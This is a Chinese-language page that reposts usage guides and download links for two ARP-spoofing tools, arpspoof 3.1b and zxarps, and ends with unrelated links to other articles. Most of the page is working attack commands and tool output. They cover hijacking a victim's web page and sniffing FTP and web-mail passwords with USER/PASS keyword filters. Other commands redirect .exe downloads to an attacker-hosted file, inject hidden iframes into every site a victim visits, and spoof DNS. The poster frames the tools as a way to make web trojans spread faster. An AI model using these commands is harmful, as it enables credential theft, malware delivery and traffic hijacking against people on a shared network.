arpspoof 3.1b

主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
[*] Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........
规则文件的使用可以看程序的书写,本程序开放源代码
希望测试出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12

下载:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp

zxarps

在当今网马横飞的日子,我帖个东东,让网马飞得更猛烈些吧

说明:
需要winPcap
基于arp欺骗,
具体功能看下面的使用说明~~~懒得打太多字了~~~

一些注意:
通常欺骗都是针对 网关和同网段下的其他机,所以-sethost [ip] 参数可以不填,
但如果同网段下有某server,而你想嗅探其他用户到该server的数据就要-sethost serverIP

Codz:


0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options:

-idx [index]       网卡索引号

-ip [ip]           欺骗的IP,用'-'指定范围,','隔开

-sethost [ip]      默认是网关,可以指定别的IP

-port [port]       关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口

-reset             恢复目标机的ARP表

-hostname          探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

','隔开关键字,多个条件'|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip]     指定要插入代码的站点域名或IP,

多个可用','隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string]  关注的后缀名,只关注HTTP/1.1 302

-hackURL [url]     发现关注的后缀名后修改URL到新的URL

-filename [name]   新URL上有效的资源文件名

-hackdns [string]  DNS欺骗,只修改UDP的报文,多个可用','隔开

格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms]     定时欺骗的时间间隔,单位:毫秒:默认是3000 ms

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认)

-speed [kb]        限制指定的IP或IP段的网络总带宽,单位:KB

example:

嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"

指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"

指定的两个IP的总带宽限制到20KB

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20

DNS欺骗

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"

zxarps Build 01/19/2007 By LZX.

下载:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

最近幻影的两个ARP欺骗工具 挺不错的相关推荐

  1. ARP欺骗工具arpspoof的用法

    ARP欺骗工具arpspoof的用法 ARP工具 ARP断网攻击 ARP欺骗 ARP工具 arpspoof 是一款进行arp欺骗的工具,攻击者可以通过它来毒化受害者arp缓存,将网关mac替换为攻击者 ...

  2. 局域网arp攻击_python制作ARP欺骗工具

    前面给大家做一些扫描工具,今天小菜给大家带来了ARP欺骗工具.当然啦,工具实现起来也是几行代码呢!(是不是依旧如此简单).这个可以让目标器断网,还可以把数据包转到自己机器上,自己机器开启转发数据包功能 ...

  3. 关于fi dd ler 手机抓包 网卡地址地址_网络抓包的高级手段:ARP欺骗工具的应用...

    网络数据包的捕获有时会遇到条件不具备的情况,就会人为利用一些手段来创造抓包环境,来完成"尴尬"局面下的数据抓取.这里我们介绍一款ARP欺骗工具-Cain&Abel. 主界面 ...

  4. 遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等2

    遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等2 endurer 原创 2007-07-24 第1版 很奇怪,今天中午在一位网友的电 ...

  5. 遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等1

    遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等1 endurer 原创 2007-07-23 第1版 一位网友说他的电脑昨晚使用时出 ...

  6. 网络安全 中间人攻击-ARP欺骗 工具:Cain

    两台虚拟机:A和B,A中有工具Cain A是攻击机, B是靶机 首先,在B中使用cmd查看IP地址,注意网关 再查看B的ARP表 都查看完之后,回带有工具的虚拟机A中,打开Cain 下面开始在Cain ...

  7. https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit )

    https攻击(openssl+sslscan+SSLsolit) openssl openssl伪造证书 sslscan.sysctl.arpspoof 中间人攻击.arp欺骗工具 arp欺骗过程 ...

  8. Python黑帽编程 3.1 ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  9. 2021年二月下旬文章导读与开源项目仓库 | scatter-gather DMA,SR-IOV,ARP欺骗,中断,Lockdep,virtio,vhost

    目录 文章目录 开源项目仓库 [转]浅谈scatter-gather DMA SR-IOV:网卡直通技术 [黑客入门] 连接公共WIFI有多危险(ARP欺骗) DPDK ACL算法介绍 文章目录 Li ...

最新文章

  1. python好学吗mooc中文网-Python全栈工程师
  2. d3中文案例_D3.js柱状图例子
  3. mysql中varchar的存储_mysql的varchar可以存储多少个汉字
  4. Edmonds_Karp 算法 (转)
  5. angularjs 上传
  6. 2-6:C++快速入门之内联函数,auto关键字,C++11基于范围的for循环和nullptr
  7. 【codevs1281】Xn数列,矩阵乘法练习
  8. mysql 中ak_数据库ak
  9. visualstudio学习
  10. java商品名称_Java统计商品信息
  11. 【转】随机函数 rand() srand() 以及seed的原理
  12. nvm在windows下的简单应用,CMD乱码,CMD的编码格式修改
  13. JTT808、JTT1078、TJSATL主动安全踩坑记录
  14. python爬取雪球网交易数据
  15. 群同态和群同构的区别_抽象代数3-1群同态的简单性质与低阶群的结构
  16. Windows 安装字体后,程序仍然提示找不到字体的解决办法——为所有用户安装字体
  17. linux与pe到移动硬盘,PE下找不到移动硬盘?不用怕
  18. 使用JAXB实现JAVA对象和XML字符串的互相转换
  19. react.js实现的时间轴js特效
  20. 使程序在Linux下后台运行

热门文章

  1. 怎么用c语言实现万年历,用C语言如何编写“万年历”
  2. java linearlayout_LinearLayout属性用法和源码分析
  3. 修改Tomcat端口号
  4. Android获取手机联系人或通讯录的基本信息(如姓名、电话)
  5. 为什么BDLocationListener没有被调用
  6. Android view转bitmap,byte[]转Bitmap
  7. python保存文件,如果目录不存在,则创建
  8. mysql-bin_MySQL - binlog日志简介及设置
  9. (JAVA)超大整数运算
  10. 鸿蒙思维和小央美,中心路汝南路站附近艺术培训